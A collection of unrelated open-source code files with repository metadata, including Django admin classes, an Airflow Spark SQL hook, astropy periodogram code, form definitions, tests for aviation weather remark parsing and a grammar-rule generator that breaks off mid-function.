"repo_name": "sergeyf/scikit-learn",
"id": "c92920ffb7280ef3d78f41f98ad0cba73ffab990",
"size": "7773",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/miscellaneous/plot_johnson_lindenstrauss_bound.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "42335"
},
{
"name": "C++",
"bytes": "147316"
},
{
"name": "Cython",
"bytes": "718114"
},
{
"name": "Makefile",
"bytes": "1711"
},
{
"name": "Python",
"bytes": "9906683"
},
{
"name": "Shell",
"bytes": "49565"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from .models import Coach, Participant, Sport, Team, Discipline, Performance
from import_export import resources
from import_export.admin import ImportExportModelAdmin
class ParticipantResource(resources.ModelResource):
"""
Class used for the export of a list of registered participants.
"""
class Meta:
model = Participant
# The fields that are used for the export.
fields = ('first_name', 'prefix', 'last_name', 'date_of_birth', 'gender', 'food_preferences',
'club__name', 'disciplines', 'disciplines__performance',)
class CoachResource(resources.ModelResource):
"""
Class used for the export of a list of registered coaches.
"""
class Meta:
model = Coach
# The fields that are used for the export.
fields = ('club__name', 'first_name', 'prefix', 'last_name', 'gender',
'phone_number', 'email', 'food_preferences', )
class TeamResource(resources.ModelResource):
"""
Class used for the export of teams.
"""
class Meta:
model = Team
# The fields that are used for the export.
fields = ('club__name', 'team_name', 'team_members')
@admin.register(Participant)
class ParticipantAdmin(ImportExportModelAdmin):
list_display = ('first_name', 'prefix', 'last_name', 'club',)
list_filter = ('disciplines', 'club', 'wheelchair_bound',)
resource_class = ParticipantResource
@admin.register(Coach)
class MyCoachAdmin(ImportExportModelAdmin):
list_display = ('first_name', 'last_name', 'email', 'club')
@admin.register(Sport)
class SportAdmin(admin.ModelAdmin):
list_display = ('name',)
@admin.register(Team)
class TeamAdmin(ImportExportModelAdmin):
list_display = ('team_name', 'club',)
@admin.register(Discipline)
class DisciplineAdmin(admin.ModelAdmin):
list_display = ('name_of_discipline', 'eventcode', 'sport',)
@admin.register(Performance)
class PerformanceAdmin(admin.ModelAdmin):
list_display = ('discipline', 'participant', 'qualification',)
| {
"content_hash": "c61e303d4c1f7c68460228ba12831d18",
"timestamp": "",
"source": "github",
"line_count": 69,
"max_line_length": 101,
"avg_line_length": 30.26086956521739,
"alnum_prop": 0.6719348659003831,
"repo_name": "wearespindle/subscriptionform",
"id": "a3c56da466a851272b732f70e5c7c04f362a22af",
"size": "2088",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "sports/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4601"
},
{
"name": "HTML",
"bytes": "21346"
},
{
"name": "Python",
"bytes": "41865"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes.fields import GenericForeignKey
class DirtyInstance(models.Model):
"""
Holds a reference to a model instance that may contain inconsistent data
that needs to be recalculated.
DirtyInstance instances are created by the insert/update/delete triggers
when related objects change.
"""
class Meta:
app_label="denorm"
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.TextField(blank=True, null=True)
content_object = GenericForeignKey()
def __str__(self):
return u'DirtyInstance: %s,%s' % (self.content_type, self.object_id)
def __unicode__(self):
return u'DirtyInstance: %s, %s' % (self.content_type, self.object_id)
| {
"content_hash": "7c82c0c93480192188b64429746a4396",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 77,
"avg_line_length": 35.5,
"alnum_prop": 0.715962441314554,
"repo_name": "initcrash/django-denorm",
"id": "a2f50dd8c41e7d712f4f2e83cee21b90cf0767ce",
"size": "876",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "denorm/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "160270"
}
],
"symlink_target": ""
} |
from distutils.core import setup
setup(
name='SQLiteMaker',
author='calebhailey',
url='https://github.com/calebhailey/sqlitemaker',
packages=['main'],
py_modules=['sqlitemaker'],
data_files=[('', ['settings.json',]),],
requires=['SQLAlchemy'],
)
| {
"content_hash": "fc020d5ade49884d0620c4048d0cea90",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 55,
"avg_line_length": 26.818181818181817,
"alnum_prop": 0.5932203389830508,
"repo_name": "calebhailey/sqlitemaker",
"id": "adb67d4816dd209f48fbf2c66f304a0d648db58a",
"size": "318",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "24480"
}
],
"symlink_target": ""
} |
__all__ = ["bls_fast", "bls_slow"]
from functools import partial
import numpy as np
from ._impl import bls_impl
def bls_slow(t, y, ivar, period, duration, oversample, use_likelihood):
"""Compute the periodogram using a brute force reference method
t : array-like
Sequence of observation times.
y : array-like
Sequence of observations associated with times t.
ivar : array-like
The inverse variance of ``y``.
period : array-like
The trial periods where the periodogram should be computed.
duration : array-like
The durations that should be tested.
oversample :
The resolution of the phase grid in units of durations.
use_likeliood : bool
If true, maximize the log likelihood over phase, duration, and depth.
Returns
-------
power : array-like
The periodogram evaluated at the periods in ``period``.
depth : array-like
The estimated depth of the maximum power model at each period.
depth_err : array-like
The 1-sigma uncertainty on ``depth``.
duration : array-like
The maximum power duration at each period.
transit_time : array-like
The maximum power phase of the transit in units of time. This
indicates the mid-transit time and it will always be in the range
(0, period).
depth_snr : array-like
The signal-to-noise with which the depth is measured at maximum power.
log_likelihood : array-like
The log likelihood of the maximum power model.
"""
f = partial(_bls_slow_one, t, y, ivar, duration, oversample, use_likelihood)
return _apply(f, period)
def bls_fast(t, y, ivar, period, duration, oversample, use_likelihood):
"""Compute the periodogram using an optimized Cython implementation
t : array-like
Sequence of observation times.
y : array-like
Sequence of observations associated with times t.
ivar : array-like
The inverse variance of ``y``.
period : array-like
The trial periods where the periodogram should be computed.
duration : array-like
The durations that should be tested.
oversample :
The resolution of the phase grid in units of durations.
use_likeliood : bool
If true, maximize the log likelihood over phase, duration, and depth.
Returns
-------
power : array-like
The periodogram evaluated at the periods in ``period``.
depth : array-like
The estimated depth of the maximum power model at each period.
depth_err : array-like
The 1-sigma uncertainty on ``depth``.
duration : array-like
The maximum power duration at each period.
transit_time : array-like
The maximum power phase of the transit in units of time. This
indicates the mid-transit time and it will always be in the range
(0, period).
depth_snr : array-like
The signal-to-noise with which the depth is measured at maximum power.
log_likelihood : array-like
The log likelihood of the maximum power model.
"""
return bls_impl(t, y, ivar, period, duration, oversample, use_likelihood)
def _bls_slow_one(t, y, ivar, duration, oversample, use_likelihood, period):
"""A private function to compute the brute force periodogram result"""
best = (-np.inf, None)
hp = 0.5 * period
min_t = np.min(t)
for dur in duration:
# Compute the phase grid (this is set by the duration and oversample).
d_phase = dur / oversample
phase = np.arange(0, period + d_phase, d_phase)
for t0 in phase:
# Figure out which data points are in and out of transit.
m_in = np.abs((t - min_t - t0 + hp) % period - hp) < 0.5 * dur
m_out = ~m_in
# Compute the estimates of the in and out-of-transit flux.
ivar_in = np.sum(ivar[m_in])
ivar_out = np.sum(ivar[m_out])
y_in = np.sum(y[m_in] * ivar[m_in]) / ivar_in
y_out = np.sum(y[m_out] * ivar[m_out]) / ivar_out
# Use this to compute the best fit depth and uncertainty.
depth = y_out - y_in
depth_err = np.sqrt(1.0 / ivar_in + 1.0 / ivar_out)
snr = depth / depth_err
# Compute the log likelihood of this model.
loglike = -0.5 * np.sum((y_in - y[m_in]) ** 2 * ivar[m_in])
loglike += 0.5 * np.sum((y_out - y[m_in]) ** 2 * ivar[m_in])
# Choose which objective should be used for the optimization.
if use_likelihood:
objective = loglike
else:
objective = snr
# If this model is better than any before, keep it.
if depth > 0 and objective > best[0]:
best = (
objective,
(
objective,
depth,
depth_err,
dur,
(t0 + min_t) % period,
snr,
loglike,
),
)
return best[1]
def _apply(f, period):
return tuple(map(np.array, zip(*map(f, period))))
| {
"content_hash": "8a02a9aaf773164a07c0bbc735ee9728",
"timestamp": "",
"source": "github",
"line_count": 148,
"max_line_length": 80,
"avg_line_length": 35.45945945945946,
"alnum_prop": 0.5889862804878049,
"repo_name": "pllim/astropy",
"id": "9686999e735be406b58390b159451c896d250bd0",
"size": "5313",
"binary": false,
"copies": "3",
"ref": "refs/heads/placeholder",
"path": "astropy/timeseries/periodograms/bls/methods.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "11040101"
},
{
"name": "C++",
"bytes": "47001"
},
{
"name": "Cython",
"bytes": "78776"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Lex",
"bytes": "183333"
},
{
"name": "M4",
"bytes": "18757"
},
{
"name": "Makefile",
"bytes": "52508"
},
{
"name": "Python",
"bytes": "12404182"
},
{
"name": "Shell",
"bytes": "17024"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
} |
'''
Created on 28 janv. 2014
@author: Alexandre Bonhomme
'''
from core.agents.AgentMovable import AgentMovable
class PacmanAgent(AgentMovable):
def __init__(self, x, y, sma):
AgentMovable.__init__(self, x, y, sma)
def action(self):
self.randomMoveInNeighborhood()
self.sma._computeDijkstraGrid(self.x, self.y)
| {
"content_hash": "1bd2a135ad3bf94c47deedec3936f42f",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 53,
"avg_line_length": 23.066666666666666,
"alnum_prop": 0.6705202312138728,
"repo_name": "blckshrk/DummySMA",
"id": "80ab76811242eb5fb7f1f6011827ecaa7693fd17",
"size": "346",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/pacman/agents/PacmanAgent.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57644"
}
],
"symlink_target": ""
} |
from flask_wtf import FlaskForm
from wtforms import StringField, BooleanField, PasswordField, TextAreaField
from wtforms.validators import DataRequired, EqualTo, Length
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('remember_me', default=False)
class SignupForm(FlaskForm):
email = StringField('Email', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired(), EqualTo('confirm', 'Passwords must match')])
confirm = PasswordField('Repeat Password')
class EditProfileForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
bio = TextAreaField('bio', validators=[Length(min=0, max=140)])
| {
"content_hash": "97423f13ee45afa49f92e71bfd1583bf",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 113,
"avg_line_length": 46.27777777777778,
"alnum_prop": 0.7430972388955582,
"repo_name": "thebigbadlonewolf/friendconnect",
"id": "070ed6033be5a2ff7b357cab84ee0bb91f1a0dd9",
"size": "833",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/forms.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "2324"
},
{
"name": "HTML",
"bytes": "11708"
},
{
"name": "Python",
"bytes": "9302"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import subprocess
from typing import TYPE_CHECKING, Any
from airflow.exceptions import AirflowException, AirflowNotFoundException
from airflow.hooks.base import BaseHook
if TYPE_CHECKING:
from airflow.models.connection import Connection
class SparkSqlHook(BaseHook):
"""
This hook is a wrapper around the spark-sql binary. It requires that the
"spark-sql" binary is in the PATH.
:param sql: The SQL query to execute
:param conf: arbitrary Spark configuration property
:param conn_id: connection_id string
:param total_executor_cores: (Standalone & Mesos only) Total cores for all executors
(Default: all the available cores on the worker)
:param executor_cores: (Standalone & YARN only) Number of cores per
executor (Default: 2)
:param executor_memory: Memory per executor (e.g. 1000M, 2G) (Default: 1G)
:param keytab: Full path to the file that contains the keytab
:param master: spark://host:port, mesos://host:port, yarn, or local
(Default: The ``host`` and ``port`` set in the Connection, or ``"yarn"``)
:param name: Name of the job.
:param num_executors: Number of executors to launch
:param verbose: Whether to pass the verbose flag to spark-sql
:param yarn_queue: The YARN queue to submit to
(Default: The ``queue`` value set in the Connection, or ``"default"``)
"""
conn_name_attr = "conn_id"
default_conn_name = "spark_sql_default"
conn_type = "spark_sql"
hook_name = "Spark SQL"
def __init__(
self,
sql: str,
conf: str | None = None,
conn_id: str = default_conn_name,
total_executor_cores: int | None = None,
executor_cores: int | None = None,
executor_memory: str | None = None,
keytab: str | None = None,
principal: str | None = None,
master: str | None = None,
name: str = "default-name",
num_executors: int | None = None,
verbose: bool = True,
yarn_queue: str | None = None,
) -> None:
super().__init__()
options: dict = {}
conn: Connection | None = None
try:
conn = self.get_connection(conn_id)
except AirflowNotFoundException:
conn = None
if conn:
options = conn.extra_dejson
# Set arguments to values set in Connection if not explicitly provided.
if master is None:
if conn is None:
master = "yarn"
elif conn.port:
master = f"{conn.host}:{conn.port}"
else:
master = conn.host
if yarn_queue is None:
yarn_queue = options.get("queue", "default")
self._sql = sql
self._conf = conf
self._total_executor_cores = total_executor_cores
self._executor_cores = executor_cores
self._executor_memory = executor_memory
self._keytab = keytab
self._principal = principal
self._master = master
self._name = name
self._num_executors = num_executors
self._verbose = verbose
self._yarn_queue = yarn_queue
self._sp: Any = None
def get_conn(self) -> Any:
pass
def _prepare_command(self, cmd: str | list[str]) -> list[str]:
"""
Construct the spark-sql command to execute. Verbose output is enabled
as default.
:param cmd: command to append to the spark-sql command
:return: full command to be executed
"""
connection_cmd = ["spark-sql"]
if self._conf:
for conf_el in self._conf.split(","):
connection_cmd += ["--conf", conf_el]
if self._total_executor_cores:
connection_cmd += ["--total-executor-cores", str(self._total_executor_cores)]
if self._executor_cores:
connection_cmd += ["--executor-cores", str(self._executor_cores)]
if self._executor_memory:
connection_cmd += ["--executor-memory", self._executor_memory]
if self._keytab:
connection_cmd += ["--keytab", self._keytab]
if self._principal:
connection_cmd += ["--principal", self._principal]
if self._num_executors:
connection_cmd += ["--num-executors", str(self._num_executors)]
if self._sql:
sql = self._sql.strip()
if sql.endswith(".sql") or sql.endswith(".hql"):
connection_cmd += ["-f", sql]
else:
connection_cmd += ["-e", sql]
if self._master:
connection_cmd += ["--master", self._master]
if self._name:
connection_cmd += ["--name", self._name]
if self._verbose:
connection_cmd += ["--verbose"]
if self._yarn_queue:
connection_cmd += ["--queue", self._yarn_queue]
if isinstance(cmd, str):
connection_cmd += cmd.split()
elif isinstance(cmd, list):
connection_cmd += cmd
else:
raise AirflowException(f"Invalid additional command: {cmd}")
self.log.debug("Spark-Sql cmd: %s", connection_cmd)
return connection_cmd
def run_query(self, cmd: str = "", **kwargs: Any) -> None:
"""
Remote Popen (actually execute the Spark-sql query)
:param cmd: command to append to the spark-sql command
:param kwargs: extra arguments to Popen (see subprocess.Popen)
"""
spark_sql_cmd = self._prepare_command(cmd)
self._sp = subprocess.Popen(
spark_sql_cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, **kwargs
)
for line in iter(self._sp.stdout): # type: ignore
self.log.info(line)
returncode = self._sp.wait()
if returncode:
raise AirflowException(
f"Cannot execute '{self._sql}' on {self._master} (additional parameters: '{cmd}'). "
f"Process exit code: {returncode}."
)
def kill(self) -> None:
"""Kill Spark job"""
if self._sp and self._sp.poll() is None:
self.log.info("Killing the Spark-Sql job")
self._sp.kill()
| {
"content_hash": "5888fd69349a58da3799c568a36af1e6",
"timestamp": "",
"source": "github",
"line_count": 174,
"max_line_length": 110,
"avg_line_length": 36.00574712643678,
"alnum_prop": 0.5771747805267359,
"repo_name": "nathanielvarona/airflow",
"id": "d6f8f56c277321f776ebc36715c9636632fc3e0d",
"size": "7052",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "airflow/providers/apache/spark/hooks/spark_sql.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "70681"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "173025"
},
{
"name": "JavaScript",
"bytes": "142848"
},
{
"name": "Jinja",
"bytes": "38895"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23169682"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211967"
},
{
"name": "TypeScript",
"bytes": "484556"
}
],
"symlink_target": ""
} |
from pprint import pprint
from diffengine.difference import hierarchical_matcher
from diffengine.tokenization import wikitext_split
tokens1 = wikitext_split.tokenize("Foo bar derp.")
print(tokens1)
for i, op in enumerate(hierarchical_matcher.diff([], tokens1)):
print("#{0}: {1}".format(i+1, repr(op)))
print("-----------------------")
tokens2 = wikitext_split.tokenize("Foo bar derp. Foo bar derp.")
print(tokens2)
for i, op in enumerate(hierarchical_matcher.diff(tokens1, tokens2)):
print("#{0}: {1}".format(i+1, repr(op)))
print("-----------------------")
tokens3 = wikitext_split.tokenize("Foo bar derp. Foo this is a bar derp.")
print(tokens3)
for i, op in enumerate(hierarchical_matcher.diff(tokens2, tokens3)):
print("#{0}: {1}".format(i+1, repr(op)))
| {
"content_hash": "856943e9041363f65c6666cb9ce9844a",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 74,
"avg_line_length": 32.416666666666664,
"alnum_prop": 0.6696658097686375,
"repo_name": "halfak/Difference-Engine",
"id": "77491ef51101e6b62653946807c3e44388f15a25",
"size": "778",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "_tmp/test.hierarchical_matcher.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "66126"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
__doc__ = """
Binary Tree Package
===================
Python Trees
------------
Balanced and unbalanced binary trees written in pure Python with a dict-like API.
Classes
~~~~~~~
* BinaryTree -- unbalanced binary tree
* AVLTree -- balanced AVL-Tree
* RBTree -- balanced Red-Black-Tree
Cython Trees
------------
Basic tree functions written in Cython/C, merged with _ABCTree() to provide the
full API of the Python Trees.
Classes
~~~~~~~
* FastBinaryTree -- unbalanced binary tree
* FastAVLTree -- balanced AVLTree
* FastRBTree -- balanced Red-Black-Tree
Overview of API for all Classes
===============================
* TreeClass ([compare]) -> new empty tree.
* TreeClass(mapping, [compare]) -> new tree initialized from a mapping
* TreeClass(seq, [compare]) -> new tree initialized from seq [(k1, v1), (k2, v2), ... (kn, vn)]
Methods
-------
* __contains__(k) -> True if T has a key k, else False, O(log(n))
* __delitem__(y) <==> del T[y], O(log(n))
* __getitem__(y) <==> T[y], O(log(n))
* __iter__() <==> iter(T)
* __len__() <==> len(T), O(1)
* __max__() <==> max(T), get max item (k,v) of T, O(log(n))
* __min__() <==> min(T), get min item (k,v) of T, O(log(n))
* __and__(other) <==> T & other, intersection
* __or__(other) <==> T | other, union
* __sub__(other) <==> T - other, difference
* __xor__(other) <==> T ^ other, symmetric_difference
* __repr__() <==> repr(T)
* __setitem__(k, v) <==> T[k] = v, O(log(n))
* clear() -> None, Remove all items from T, , O(n)
* copy() -> a shallow copy of T, O(n*log(n))
* discard(k) -> None, remove k from T, if k is present, O(log(n))
* get(k[,d]) -> T[k] if k in T, else d, O(log(n))
* is_empty() -> True if len(T) == 0, O(1)
* items([reverse]) -> list of T's (k, v) pairs, as 2-tuple, O(n)
* keys([reverse]) -> list of T's keys, O(n)
* values([reverse]) -> list of T's values, O(n)
* pop(k[,d]) -> v, remove specified key and return the corresponding value, O(log(n))
* pop_item() -> (k, v), remove and return some (key, value) pair as a 2-tuple, O(log(n))
* set_default(k[,d]) -> T.get(k, d), also set T[k]=d if k not in T, O(log(n))
* update(E) -> None. Update T from dict/iterable E, O(E*log(n))
* iter_items(s, e, reverse) -> generator for (k, v) items of T for s <= key < e, O(n)
walk forward/backward, O(log(n))
* prev_item(key) -> get (k, v) pair, where k is predecessor to key, O(log(n))
* prev_key(key) -> k, get the predecessor of key, O(log(n))
* succ_item(key) -> get (k,v) pair as a 2-tuple, where k is successor to key, O(log(n))
* succ_key(key) -> k, get the successor of key, O(log(n))
slicing by keys
* item_slice(s, e, reverse) -> generator for (k, v) items of T for s <= key < e, O(n), synonym for iter_items(...)
* key_slice(s, e, reverse) -> generator for keys of T for s <= key < e, O(n)
* value_slice(s, e, reverse) -> generator for values of T for s <= key < e, O(n)
* T[s:e] -> TreeSlice object, with keys in range s <= key < e, O(n)
* del T[s:e] -> remove items by key slicing, for s <= key < e, O(n)
if 's' is None or T[:e] TreeSlice/iterator starts with value of min_key()
if 'e' is None or T[s:] TreeSlice/iterator ends with value of max_key()
T[:] is a TreeSlice which represents the whole tree.
The step argument of the regular slicing syntax T[s:e:step] will silently ignored.
TreeSlice is a tree wrapper with range check, and contains no references
to objects, deleting objects in the associated tree also deletes the object
in the TreeSlice.
* TreeSlice[k] -> get value for key k, raises KeyError if k not exists in range s:e
* TreeSlice[s1:e1] -> TreeSlice object, with keys in range s1 <= key < e1
* new lower bound is max(s, s1)
* new upper bound is min(e, e1)
TreeSlice methods:
* items() -> generator for (k, v) items of T, O(n)
* keys() -> generator for keys of T, O(n)
* values() -> generator for values of T, O(n)
* __iter__ <==> keys()
* __repr__ <==> repr(T)
* __contains__(key)-> True if TreeSlice has a key k, else False, O(log(n))
Heap methods
* max_item() -> get biggest (key, value) pair of T, O(log(n))
* max_key() -> get biggest key of T, O(log(n))
* min_item() -> get smallest (key, value) pair of T, O(log(n))
* min_key() -> get smallest key of T, O(log(n))
* pop_min() -> (k, v), remove item with minimum key, O(log(n))
* pop_max() -> (k, v), remove item with maximum key, O(log(n))
* nlargest(i[,pop]) -> get list of i largest items (k, v), O(i*log(n))
* nsmallest(i[,pop]) -> get list of i smallest items (k, v), O(i*log(n))
Set methods (using frozenset)
* intersection(t1, t2, ...) -> Tree with keys *common* to all trees
* union(t1, t2, ...) -> Tree with keys from *either* trees
* difference(t1, t2, ...) -> Tree with keys in T but not any of t1, t2, ...
* symmetric_difference(t1) -> Tree with keys in either T and t1 but not both
* is_subset(S) -> True if every element in T is in S
* is_superset(S) -> True if every element in S is in T
* is_disjoint(S) -> True if T has a null intersection with S
Classmethods
* from_keys(S[,v]) -> New tree with keys from S and values equal to v.
Helper functions
* bintrees.has_fast_tree_support() -> True if Cython extension is working else False (False = using pure Python implementation)
"""
from .bintree import BinaryTree
from .avltree import AVLTree
from .rbtree import RBTree
def has_fast_tree_support():
return FastBinaryTree is not BinaryTree
try:
from .cython_trees import FastBinaryTree
except ImportError: # fall back to pure Python version
FastBinaryTree = BinaryTree
try:
from .cython_trees import FastAVLTree
except ImportError: # fall back to pure Python version
FastAVLTree = AVLTree
try:
from .cython_trees import FastRBTree
except ImportError: # fall back to pure Python version
FastRBTree = RBTree
| {
"content_hash": "2fe348d5a2fd88e1be9c39711baf3adf",
"timestamp": "",
"source": "github",
"line_count": 162,
"max_line_length": 127,
"avg_line_length": 36.68518518518518,
"alnum_prop": 0.6168601716304897,
"repo_name": "emptyewer/DEEPN",
"id": "07a68c04bfff264d1d4580c4a584cfa09cc60424",
"size": "6125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libraries/bintrees/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "833"
},
{
"name": "Inno Setup",
"bytes": "1623"
},
{
"name": "OpenEdge ABL",
"bytes": "41306261"
},
{
"name": "Python",
"bytes": "1108317"
},
{
"name": "Shell",
"bytes": "1944"
},
{
"name": "TeX",
"bytes": "95537"
}
],
"symlink_target": ""
} |
"""
Tests remarks elements parsing
"""
# pylint: disable=protected-access
# library
import unittest
# module
from avwx import static, structs
from avwx.parsing import core, remarks
class TestRemarks(unittest.TestCase):
"""
Tests remarks elements parsing
"""
def test_tdec(self):
"""
Tests that a 4-digit number gets decoded into a readable temperature
"""
for code, temp in (("1045", "-4.5°C"), ("0237", "23.7°C"), ("0987", "98.7°C")):
self.assertEqual(remarks._tdec(code), temp)
def test_temp_minmax(self):
"""
Tests the minimum and maximum temperature translation string
"""
for code, ttype, temp in (
("21045", "minimum", "-4.5°C"),
("10237", "maximum", "23.7°C"),
("10987", "maximum", "98.7°C"),
):
equals = f"6-hour {ttype} temperature {temp}"
self.assertEqual(remarks.temp_minmax(code), equals)
def test_pressure_tendency(self):
"""
Tests translating the pressure tendency code
"""
for code, pressure in (("50123", "12.3"), ("54987", "98.7"), ("51846", "84.6")):
equals = (
"3-hour pressure difference: +/- "
f"{pressure} mb - {static.taf.PRESSURE_TENDENCIES[code[1]]}"
)
self.assertEqual(remarks.pressure_tendency(code), equals)
def test_precip_36(self):
"""
Tests translating the three and six hour precipitation code
"""
for code, three, six in (("60720", 7, 20), ("60000", 0, 0), ("60104", 1, 4)):
equals = (
f"Precipitation in the last 3 hours: {three} in. - 6 hours: {six} in."
)
self.assertEqual(remarks.precip_36(code), equals)
def test_precip_24(self):
"""
Tests translating the 24-hour precipitation code
"""
for code, precip in (("70016", 16), ("79999", 9999), ("70000", 0)):
equals = f"Precipitation in the last 24 hours: {precip} in."
self.assertEqual(remarks.precip_24(code), equals)
def test_sunshine_duration(self):
"""
Tests translating the sunshine duration code
"""
for code, minutes in (("90000", 0), ("99999", 9999), ("91234", 1234)):
equals = f"Duration of sunlight: {minutes} minutes"
self.assertEqual(remarks.sunshine_duration(code), equals)
def test_parse(self):
"""
Tests generating RemarksData from a remarks string
"""
for rmk, data in (
("", (None, None)),
("T09870123", ("12.3", "98.7")),
("RMK AO2 SLP141 T02670189 $", ("18.9", "26.7")),
):
data = [core.make_number(d) for d in data]
self.assertEqual(remarks.parse(rmk), structs.RemarksData(*data))
def test_translate(self):
"""
Tests extracting translations from the remarks string
"""
for rmk, out in (
(
"RMK AO1 ACFT MSHP SLP137 T02720183 BINOVC",
{
"ACFT MSHP": "Aircraft mishap",
"AO1": "Automated with no precipitation sensor",
"BINOVC": "Breaks in Overcast",
"SLP137": "Sea level pressure: 1013.7 hPa",
"T02720183": "Temperature 27.2°C and dewpoint 18.3°C",
},
),
(
"RMK AO2 51014 21045 60720 70016",
{
"21045": "6-hour minimum temperature -4.5°C",
"51014": "3-hour pressure difference: +/- 1.4 mb - Increasing, then steady",
"60720": "Precipitation in the last 3 hours: 7 in. - 6 hours: 20 in.",
"70016": "Precipitation in the last 24 hours: 16 in.",
"AO2": "Automated with precipitation sensor",
},
),
(
"RMK 91234 TSB20 P0123 NOSPECI $",
{
"$": "ASOS requires maintenance",
"91234": "Duration of sunlight: 1234 minutes",
"NOSPECI": "No SPECI reports taken",
"P0123": "Hourly precipitation: 1.23 in.",
"TSB20": "Thunderstorm began at :20",
},
),
):
self.assertEqual(remarks.translate(rmk), out)
| {
"content_hash": "44fc4e142e2570ae10cccb3d16032b2b",
"timestamp": "",
"source": "github",
"line_count": 124,
"max_line_length": 96,
"avg_line_length": 35.943548387096776,
"alnum_prop": 0.5054969710567646,
"repo_name": "flyinactor91/AVWX-Engine",
"id": "bbfcd53c85ffa826ee49157c2e34e83a8e5fb925",
"size": "4466",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/parsing/test_remarks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "172268"
}
],
"symlink_target": ""
} |
from application import application as app
import settings
import request
import database
if __name__ == "__main__":
database.init_db()
app.run()
| {
"content_hash": "9854b3d52837a5b1e787c549f99816fa",
"timestamp": "",
"source": "github",
"line_count": 8,
"max_line_length": 42,
"avg_line_length": 19.375,
"alnum_prop": 0.6967741935483871,
"repo_name": "peixinchen/TravisCITest",
"id": "5d5da0500230fe95d6b72b6e5ac9fa9caf8330c6",
"size": "155",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/togo/togo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "919"
},
{
"name": "Python",
"bytes": "4586"
}
],
"symlink_target": ""
} |
import hashlib
import importlib
import os
import requests
GRAMMAR_FILE_NAME = "__init__.py"
GRAMMAR_FOLDER_NAME = "gen"
GRAMMAR_ID = "5a0bc90e734d1d08bf70e0ff"
GRAMMAR_URL = "http://localhost:2666/grammar/{}".format(GRAMMAR_ID)
class GrammarRule:
def __init__(self, text, data_hash):
self.text = text
self.data_hash = data_hash
class GrammarRuleFactory:
def __init__(self):
self.rules = {}
def _get_hash_from_dict(self, d):
return hashlib.md5(str(d).encode('utf-8')).hexdigest()
def get_or_create_rule(self, rulename, details, keywords):
"""
Creates a GrammarRule if it doesn't exist
"""
if rulename not in self.rules.keys() or self.rules[rulename].data_hash != self._get_hash_from_dict(details):
func_string = self._get_func_string(rulename, details, keywords)
self.rules[rulename] = GrammarRule(func_string, self._get_hash_from_dict(details))
return self.rules[rulename]
def delete_rule(self, rulename):
"""
Deletes a rule
"""
if rulename in self.rules:
del self.rules[rulename]
def _get_func_string(self, rulename, details, keywords):
res = "def {}(): ".format(rulename)
if details['type'] == 'variable':
res += "return RegExMatch(r'{}')".format(details['value'][0])
elif details['type'] == 'rule':
res += "return "
final_value = ''
if details['join'] == 'and':
final_value += "{}".format(", ".join(self._fix_list(details['value'], keywords)))
elif details['join'] == 'or':
final_value += "[{}]".format(", ".join(self._fix_list(details['value'], keywords)))
if details['oneOrMore']:
final_value = "OneOrMore({}, sep=',')".format(final_value)
res += final_value
return res
def _fix_list(self, l, keywords):
result = []
for item in l:
if item in keywords:
result.append('"{}"'.format(item))
else:
result.append(item)
return result
grammarRuleFactory = GrammarRuleFactory()
class GrammarState:
current_hash = ''
primary_key = None
gen_module = None
def _verify_hash(data):
if data['hash'] == GrammarState.current_hash:
return True
GrammarState.current_hash = data['hash']
return False
def _generate_file_from_data(data):
if _verify_hash(data):
importlib.reload(GrammarState.gen_module)
keywords = set(data['keywords'])
variables = set(data['variables'])
